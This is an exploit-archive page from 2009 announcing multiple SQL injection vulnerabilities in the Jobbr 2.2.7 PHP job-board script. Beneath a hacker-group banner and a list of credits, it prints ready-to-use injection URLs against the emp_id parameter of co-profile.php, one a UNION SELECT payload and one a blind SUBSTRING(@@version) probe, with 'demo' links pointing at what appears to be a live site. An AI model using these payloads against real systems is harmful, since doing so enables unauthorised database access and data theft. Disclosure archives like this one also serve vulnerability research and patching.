[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Jobbr 2.2.7 Multiple Remote SQL Injection Vulnerabilities
# Published : 2009-07-10
# Author : Moudi
# Previous Title : WordPress Privileges Unchecked in admin.php and Multiple Information
# Next Title : Joomla Component com_propertylab (auction_id) SQL injection Vuln


###########################################################################
#-----------------------------I AM MUSLIM !!------------------------------#
###########################################################################

==============================================================================
                      _      _       _          _      _   _ 
                     /     | |     | |        /     | | | |
                    / _    | |     | |       / _    | |_| |
                   / ___   | |___  | |___   / ___   |  _  |
   IN THE NAME OF /_/   _ |_____| |_____| /_/   _ |_| |_|
                                                             

==============================================================================
        [??] Hmmmm !? Nothing ! :D
==============================================================================
        [??] Jobbr v2.2.7 Multiple Remote SQL Injection Vulnerabilities
==============================================================================

	[??] Script:             [ Jobbr v2.2.7 ]
	[??] Language:           [ PHP ]
        [??] Download:           [ http://urx.in/jobbr ]
	[??] Founder:            [ Moudi or SixSo <m0udi@9.cn> ]
        [??] Thanks to:          [ MiZoZ , ZuKa , str0ke , 599em Man...]
        [??] Team:               [ EvilWay ]
        [??] SiteWeb:            [ Visit - www.opensc.ws ]
        [??] Price:              [ FREE ]

###########################################################################

===[ Exploit BLIND SQL + DEMO ]===	
	
	[??] http://www.site.com/co-profile.php?emp_id=[SQL]
	[??] http://www.jobbr.us/co-profile.php?emp_id=null+union+select+version(),2,3,4,5,6,7,8--

===[ Exploit BLIND SQL + DEMO ]===

	[??] http://www.site.com/co-profile.php?emp_id=[BLIND]
	[??] http://www.jobbr.us/co-profile.php?emp_id=1+AND%20SUBSTRING(@@version,1,1)=5


Author: Moudi

###########################################################################

# www.Syue.com [2009-07-10]